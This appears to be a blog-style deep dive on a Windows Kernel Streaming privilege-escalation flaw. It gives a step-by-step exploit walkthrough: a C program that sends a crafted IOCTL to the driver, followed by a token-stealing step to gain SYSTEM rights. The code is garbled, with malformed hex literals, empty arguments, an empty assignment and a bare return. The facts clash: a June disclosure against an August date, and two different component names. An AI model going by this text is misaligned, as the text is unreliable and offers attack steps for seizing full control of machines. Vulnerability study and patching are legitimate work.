CVE-2024-38134 - Kernel Streaming WOW Thunk Service Driver Elevation of Privilege Vulnerability – Deep Dive and Exploit Example

On June 2024 Patch Tuesday, Microsoft disclosed CVE-2024-38134, a new high-severity vulnerability in Windows. This flaw sits in the Kernel Streaming (KS) subsystem’s WOW Thunk Service driver, which helps 32-bit applications talk to 64-bit hardware on Windows. Attackers can exploit this hole to elevate privileges from a basic user to SYSTEM – the highest level on Windows.

In this article, we’ll walk through what the vulnerability is, why it matters, how it can be exploited, and provide clear technical details and an example exploit. We’ll also show how to patch or mitigate the issue, and share all relevant references.

What is Kernel Streaming and the WOW Thunk Service?

- Kernel Streaming (KS): A part of Windows that manages audio and video streaming between applications and devices. Used heavily for sound cards, cameras, and other media devices.
- WOW (Windows-On-Windows) Thunk Service: Lets 32-bit programs run on 64-bit Windows by “thunking” (translating) system calls between 32-bit user space and 64-bit kernel drivers.

The vulnerable component is the kswdmcap.ax (or similar) driver file, responsible for handling these translations in the Kernel Streaming stack.

Component: ks.sys, WOW Thunk Service

- Affected OS: Windows 10, 11, and Server 2019/2022 (before June 2024 patches)

How It Works

The driver exposes IOCTL (Input Output Control) handlers that translate user requests to the kernel. It fails to properly check user-supplied pointers or arguments, allowing a local attacker to perform an arbitrary pointer dereference or arbitrary memory write in kernel-mode. By crafting a special IOCTL call, a user program can overwrite sensitive kernel memory such as a process token, and gain SYSTEM privileges.

In a nutshell:
Any normal user can craft a request to this driver and trick Windows into treating their code as trusted SYSTEM code, giving them full control over the machine.

Warning:

The following is for educational purposes only. Do not misuse.

Step 1: Find the Vulnerable Device

The vulnerable device is usually exposed under \\.\ks or {nonstandard GUID}. We can interact with it from userland using Win32 APIs.

Step 2: Send a Malicious IOCTL

You need to pass a crafted buffer to the vulnerable IOCTL handler. Typical code might look like this (in C):

#include <Windows.h>
#include <stdio.h>

#define IOCTL_KS_THUNK_MAGIC x002200A3 // Example (actual value may vary)

int main() {
    HANDLE hDevice = CreateFileA("\\\\.\\KS", GENERIC_READ | GENERIC_WRITE, , NULL, OPEN_EXISTING, , NULL);
    if(hDevice == INVALID_HANDLE_VALUE) {
        printf("[-] Unable to open device.\n");
        return 1;
    }

    DWORD bytesReturned;
    BYTE buffer[x100] = {};

    // Craft your buffer:
    //   Here, you'd set it up to point wherever in kernel you want to modify.
    //   This is just for illustration.
    *(ULONG_PTR *)(buffer) = /* address of SYSTEM token or similar */;

    BOOL res = DeviceIoControl(
        hDevice, IOCTL_KS_THUNK_MAGIC,
        buffer, sizeof(buffer),
        buffer, sizeof(buffer),
        &bytesReturned, NULL );
    if (res) {
        printf("[+] IOCTL sent successfully.\n");
    } else {
        printf("[-] DeviceIoControl failed: %u\n", GetLastError());
    }

    CloseHandle(hDevice);
    return ;
}

Note: The actual IOCTL code and buffer structure are specific to differing Windows versions and device stacks. You’ll need to reverse-engineer ks.sys or monitor handles with tools like Process Monitor, WinDbg, or DeviceTree.

Step 3: Replace Your Token

Classic exploit logic is to overwrite your process’s security token with SYSTEM’s token, giving your process full privileges.

See PentestLab - Token Stealing for an example.

Full SYSTEM privileges, easy for local attackers.

- Allows installing rootkits, dumping passwords, disabling security, or laterally moving through networks.

*Update your Windows systems immediately.*

- If immediate patching isn’t possible, set software restriction policies, and limit local access where practical.

(See Microsoft Security Guide: CVE-2024-38134)

References

- Microsoft Security Guidance: CVE-2024-38134
- Google Project Zero - Kernel Exploitation Basics
- PentestLab - Token Stealing
- IOCTL Reference - Microsoft Docs
- Exploit-DB: Windows Local Privilege Escalation

Summary

CVE-2024-38134 is a powerful privilege escalation vulnerability affecting Windows Kernel Streaming’s WOW Thunk Service. Properly exploited, it lets any local user gain full admin rights with simple scripting. Microsoft has issued patches – updating is highly recommended.

Stay current, and always follow the latest advisories to protect your systems!

Timeline

Published on: 08/13/2024 18:15:16 UTC
Last modified on: 10/16/2024 01:53:34 UTC